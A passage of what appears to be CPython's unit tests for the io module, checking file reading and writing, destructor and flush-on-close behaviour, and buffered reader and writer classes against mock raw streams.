self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
